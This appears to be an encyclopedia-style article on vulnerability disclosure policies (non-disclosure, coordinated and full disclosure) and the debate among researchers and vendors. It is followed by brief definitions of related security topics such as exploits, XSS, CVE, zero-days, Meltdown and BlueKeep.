In the field of computer security, independent researchers often discover flaws in software that can be abused to cause unintended behaviour; these flaws are called vulnerabilities. The process by which the analysis of these vulnerabilities is shared with third parties is the subject of much debate, and is referred to as the researcher's disclosure policy. Full disclosure is the practice of publishing analysis of software vulnerabilities as early as possible, making the data accessible to everyone without restriction. The primary purpose of widely disseminating information about vulnerabilities is so that potential victims are as knowledgeable as those who attack them. [1]
In his 2007 essay on the topic, Bruce Schneier stated "Full disclosure – the practice of making the details of security vulnerabilities public – is a damned good idea. Public scrutiny is the only reliable way to improve security, while secrecy only makes us less secure." [2] Leonard Rose, co-creator of an electronic mailing list that has superseded bugtraq to become the de facto forum for disseminating advisories, explains "We don't believe in security by obscurity, and as far as we know, full disclosure is the only way to ensure that everyone, not just the insiders, have access to the information we need." [3]
The controversy around the public disclosure of sensitive information is not new. The issue of full disclosure was first raised in the context of locksmithing, in a 19th-century controversy regarding whether weaknesses in lock systems should be kept secret in the locksmithing community, or revealed to the public. [4] Today, there are three major disclosure policies under which most others can be categorized: [5] Non Disclosure, Coordinated Disclosure, and Full Disclosure.
The major stakeholders in vulnerability research have their disclosure policies shaped by various motivations, it is not uncommon to observe campaigning, marketing or lobbying for their preferred policy to be adopted and chastising those who dissent. Many prominent security researchers favor full disclosure, whereas most vendors prefer coordinated disclosure. Non disclosure is generally favored by commercial exploit vendors and blackhat hackers. [6]
Coordinated vulnerability disclosure is a policy under which researchers agree to report vulnerabilities to a coordinating authority, which then reports it to the vendor, tracks fixes and mitigations, and coordinates the disclosure of information with stakeholders including the public. [7] [8] In some cases the coordinating authority is the vendor. The premise of coordinated disclosure is typically that nobody should be informed about a vulnerability until the software vendor says it is time. [9] [10] While there are often exceptions or variations of this policy, distribution must initially be limited and vendors are given privileged access to nonpublic research. [11]
The original name for this approach was "responsible disclosure", based on the essay by Microsoft Security Manager Scott Culp “It's Time to End Information Anarchy” [12] (referring to full disclosure). Microsoft later called for the term to be phased out in favor of “Coordinated Vulnerability Disclosure” (CVD). [13] [14]
Although the reasoning varies, many practitioners argue that end-users cannot benefit from access to vulnerability information without guidance or patches from the vendor, so the risks of sharing research with malicious actors is too great for too little benefit. As Microsoft explain, "[Coordinated disclosure] serves everyone's best interests by ensuring that customers receive comprehensive, high-quality updates for security vulnerabilities but are not exposed to malicious attacks while the update is being developed." [14]
To prevent vendors to indefinitely delaying the disclosure, a common practice in the security industry, pioneered by Google, [15] is to publish all the details of vulnerabilities after a deadline, usually 90 or 120 [16] days reduced to 7 days if the vulnerability is under active exploitation. [17]
Full disclosure is the policy of publishing information on vulnerabilities without restriction as early as possible, making the information accessible to the general public without restriction. In general, proponents of full disclosure believe that the benefits of freely available vulnerability research outweigh the risks, whereas opponents prefer to limit the distribution.
The free availability of vulnerability information allows users and administrators to understand and react to vulnerabilities in their systems, and allows customers to pressure vendors to fix vulnerabilities that vendors may otherwise feel no incentive to solve. There are some fundamental problems with coordinated disclosure that full disclosure can resolve.
Discovery of a specific flaw or vulnerability is not a mutually exclusive event, multiple researchers with differing motivations can and do discover the same flaws independently.
There is no standard way to make vulnerability information available to the public, researchers often use mailing lists dedicated to the topic, academic papers or industry conferences.
Non disclosure is the policy that vulnerability information should not be shared, or should only be shared under non-disclosure agreement (either contractually or informally).
Common proponents of non-disclosure include commercial exploit vendors, researchers who intend to exploit the flaws they find, [5] and proponents of security through obscurity.
In 2009, Charlie Miller, Dino Dai Zovi and Alexander Sotirov announced at the CanSecWest conference the "No More Free Bugs" campaign, arguing that companies are profiting and taking advantage of security researchers by not paying them for disclosing bugs. [18] This announcement made it to the news and opened a broader debate about the problem and its associated incentives. [19] [20]
Researchers in favor of coordinated disclosure believe that users cannot make use of advanced knowledge of vulnerabilities without guidance from the vendor, and that the majority is best served by limiting distribution of vulnerability information. Advocates argue that low-skilled attackers can use this information to perform sophisticated attacks that would otherwise be beyond their ability, and the potential benefit does not outweigh the potential harm caused by malevolent actors. Only when the vendor has prepared guidance that even the most unsophisticated users can digest should the information be made public.
This argument presupposes that vulnerability discovery is a mutually exclusive event, that only one person can discover a vulnerability. There are many examples of vulnerabilities being discovered simultaneously, often being exploited in secrecy before discovery by other researchers. [21] While there may exist users who cannot benefit from vulnerability information, full disclosure advocates believe this demonstrates a contempt for the intelligence of end users. While it's true that some users cannot benefit from vulnerability information, if they're concerned with the security of their networks they are in a position to hire an expert to assist them as you would hire a mechanic to help with a car.
Non disclosure is typically used when a researcher intends to use knowledge of a vulnerability to attack computer systems operated by their enemies, or to trade knowledge of a vulnerability to a third party for profit, who will typically use it to attack their enemies.
Researchers practicing non disclosure are generally not concerned with improving security or protecting networks. However, some proponents[ who? ] argue that they simply do not want to assist vendors, and claim no intent to harm others.
While full and coordinated disclosure advocates declare similar goals and motivations, simply disagreeing on how best to achieve them, non disclosure is entirely incompatible.
In the context of an operating system, a device driver is a computer program that operates or controls a particular type of device that is attached to a computer or automaton. A driver provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used.
An exploit is a method or piece of code that takes advantage of vulnerabilities in software, applications, networks, operating systems, or hardware, typically for malicious purposes. The term "exploit" derives from the English verb "to exploit," meaning "to use something to one’s own advantage." Exploits are designed to identify flaws, bypass security measures, gain unauthorized access to systems, take control of systems, install malware, or steal sensitive data. While an exploit by itself may not be a malware, it serves as a vehicle for delivering malicious software by breaching security controls.
Defensive programming is a form of defensive design intended to develop programs that are capable of detecting potential security abnormalities and make predetermined responses. It ensures the continuing function of a piece of software under unforeseen circumstances. Defensive programming practices are often used where high availability, safety, or security is needed.
Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. During the second half of 2007, XSSed documented 11,253 site-specific cross-site vulnerabilities, compared to 2,134 "traditional" vulnerabilities documented by Symantec. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner network.
A patch is data that is intended to be used to modify an existing software resource such as a program or a file, often to fix bugs and security vulnerabilities. A patch may be created to improve functionality, usability, or performance. A patch is typically provided by a vendor for updating the software that they provide. A patch may be created manually, but commonly it is created via a tool that compares two versions of the resource and generates data that can be used to transform one to the other.
A grey hat is a computer hacker or computer security expert who may sometimes violate laws or typical ethical standards, but usually does not have the malicious intent typical of a black hat hacker.
Vulnerabilities are flaws in a computer system that weaken the overall security of the system.
The Common Vulnerabilities and Exposures (CVE) system provides a reference method for publicly known information-security vulnerabilities and exposures. The United States' National Cybersecurity FFRDC, operated by The MITRE Corporation, maintains the system, with funding from the US National Cyber Security Division of the US Department of Homeland Security. The system was officially launched for the public in September 1999.
The CERT Coordination Center (CERT/CC) is the coordination center of the computer emergency response team (CERT) for the Software Engineering Institute (SEI), a non-profit United States federally funded research and development center. The CERT/CC researches software bugs that impact software and internet security, publishes research and information on its findings, and works with businesses and the government to improve the security of software and the internet as a whole.
In computer security, coordinated vulnerability disclosure is a vulnerability disclosure model in which a vulnerability or an issue is disclosed to the public only after the responsible parties have been allowed sufficient time to patch or remedy the vulnerability or issue. This coordination distinguishes the CVD model from the "full disclosure" model.
A zero-day is a vulnerability in software or hardware that is typically unknown to the vendor and for which no patch or other fix is available. The vendor has zero days to prepare a patch as the vulnerability has already been described or exploited.
Malwarebytes is anti-malware software for Microsoft Windows, macOS, ChromeOS, Android, and iOS that finds and removes malware. Made by Malwarebytes Corporation, it was first released in January 2006. This is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash-memory scanner.
A bug bounty program is a deal offered by many websites, organizations, and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to security exploits and vulnerabilities.
Project Zero is a team of security analysts employed by Google tasked with finding zero-day vulnerabilities. It was announced on 15 July 2014.
JASBUG is a security bug disclosed in February 2015 and affecting core components of the Microsoft Windows Operating System. The vulnerability dated back to 2000 and affected all supported editions of Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1.
Katie Moussouris is an American computer security researcher, entrepreneur, and pioneer in vulnerability disclosure, and is best known for her ongoing work advocating responsible security research. Previously a member of @stake, she created the bug bounty program at Microsoft and was directly involved in creating the U.S. Department of Defense's first bug bounty program for hackers. She previously served as Chief Policy Officer at HackerOne, a vulnerability disclosure company based in San Francisco, California, and currently is the founder and CEO of Luta Security.
Meltdown is one of the two original transient execution CPU vulnerabilities. Meltdown affects Intel x86 microprocessors, IBM Power microprocessors, and some ARM-based microprocessors. It allows a rogue process to read all memory, even when it is not authorized to do so.
The Microarchitectural Data Sampling (MDS) vulnerabilities are a set of weaknesses in Intel x86 microprocessors that use hyper-threading, and leak data across protection boundaries that are architecturally supposed to be secure. The attacks exploiting the vulnerabilities have been labeled Fallout, RIDL, ZombieLoad., and ZombieLoad 2.
BlueKeep is a security vulnerability that was discovered in Microsoft's Remote Desktop Protocol (RDP) implementation, which allows for the possibility of remote code execution.
Zero Day Initiative (ZDI) is an international software vulnerability initiative that was started in 2005 by TippingPoint, a division of 3Com. The program was acquired by Trend Micro as a part of the HP TippingPoint acquisition in 2015.
{{cite web}}
: CS1 maint: numeric names: authors list (link)